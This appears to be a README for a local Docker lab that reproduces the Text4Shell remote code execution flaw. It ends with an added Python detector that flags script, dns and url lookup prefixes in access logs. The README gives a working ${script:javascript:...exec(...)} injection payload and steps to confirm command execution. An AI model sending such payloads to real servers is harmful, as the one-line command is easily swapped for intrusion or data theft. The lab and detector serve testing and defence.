Install maven - maven-linux
- Docker build
docker build --tag=text4shell .
- Docker run
docker run -p 80:8080 text4shell
- Test the app
http://localhost/text4shell/attack?search=<anything>
- The attack can be performed by passing a string “${prefix:name}”, where the prefix is the aforementioned lookup:
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
- You can also try using dns or url prefixes.
- Get the container id
Get the container id
docker container ls
- Get into the app
docker exec -it <container_id> bash
- To check whether the above RCE was successful (you should see a file named foo created in the /tmp directory):
ls /tmp/
- To stop the container
docker container stop <container_id>
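
For the “${prefix:name}” step above, a detection sketch a defender can run over the web server's access log to flag requests carrying the script, dns or url lookup prefixes. This is an added example, not part of the original project. The log lines are constructed, the combined-log request format is an assumption, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Lookup prefixes named on this page; matched case-insensitively to be conservative.
RISKY_LOOKUP = re.compile(r"\$\{\s*(script|dns|url)\s*:", re.IGNORECASE)
# Request target inside a common/combined-format access log line (assumed format).
REQUEST = re.compile(r'"[A-Z]+ (.*?) HTTP/[\d.]+"')


def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly so a double-encoded '%2524%257B' is still seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_lookup(line):
    """Return the risky lookup prefix found in the request target, or None."""
    match = REQUEST.search(line)
    if not match:
        return None
    hit = RISKY_LOOKUP.search(decode_fully(match.group(1)))
    return hit.group(1).lower() if hit else None


def scan(lines):
    """Return (line_number, prefix) for every log line that carries a risky lookup."""
    return [(n, p) for n, line in enumerate(lines, 1) if (p := find_lookup(line))]


# Constructed sample log lines: benign search, encoded script lookup,
# double-encoded upper-case dns lookup, and a lookup prefix outside the risky set.
SAMPLE_LOG = [
    '172.17.0.1 - - [01/Jan/2023:10:00:00 +0000] "GET /text4shell/attack?search=hello HTTP/1.1" 200 32',
    '172.17.0.1 - - [01/Jan/2023:10:00:05 +0000] "GET /text4shell/attack?search=%24%7Bscript%3Ajavascript%3A1%2B1%7D HTTP/1.1" 200 32',
    '172.17.0.1 - - [01/Jan/2023:10:00:09 +0000] "GET /text4shell/attack?search=%2524%257BDNS%253Aexample.test%257D HTTP/1.1" 200 32',
    '172.17.0.1 - - [01/Jan/2023:10:00:12 +0000] "GET /text4shell/attack?search=%24%7Bdate%3Ayyyy%7D HTTP/1.1" 200 32',
]

if __name__ == "__main__":
    for line_no, prefix in scan(SAMPLE_LOG):
        print(f"line {line_no}: {prefix} lookup in request")
```

A match only shows that a lookup string reached the server; whether it was evaluated depends on the application and library version.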